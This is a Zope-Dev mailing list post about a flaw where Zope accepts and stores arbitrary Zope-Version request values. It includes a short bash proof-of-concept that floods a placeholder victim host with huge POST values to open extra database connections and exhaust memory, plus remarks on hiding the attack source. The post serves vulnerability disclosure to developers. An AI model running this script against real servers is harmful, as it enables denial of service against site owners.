Oliver Bleutgen wrote: > 2. Zope doesn't care if a correspondending Version instance to the value > of REQUEST['Zope-Version'] exists, more exactly, zope doesn't care for > the value of that Zope-Version variable at all.
Hmm, it doesn't care, but it does store it in memory. Pardon my fugly non-portable bashisms here, but I just wanted to hash out an example: #!/path/to/bash exec >/dev/null h='http://victim.example.com/' for i in `seq 100`; do w3m -dump -post <(perl -e 'print "Zope-Version=",$ARGV[0]x500000' $i) "$h" done Quick way to add 100 zodb connections and ~90M to the memory footprint with relatively little clue of who is responsible assuming traditional logging; presumeably one would get much trickier if they really wanted to obfuscate the source of attack, slowly crawling the site, changing the user-agent string, etc. Under sane resource limits the host is spared however the /Control_Panel/Database/manage_cacheParameters resource becomes unavailable due to memory constraints. Other side-effects from allowing anonymous clients to open additional zodb connections are as of yet unknown to me, anyone care to speculate on other vectors of abuse? -- Jamie Heilman http://audible.transient.net/~jamie/ "We must be born with an intuition of mortality. Before we know the words for it, before we know there are words, out we come bloodied and squalling with the knowledge that for all the compasses in the world, there's only one direction, and time is its only measure." -Rosencrantz _______________________________________________ Zope-Dev maillist - [EMAIL PROTECTED] http://mail.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://mail.zope.org/mailman/listinfo/zope-announce http://mail.zope.org/mailman/listinfo/zope )
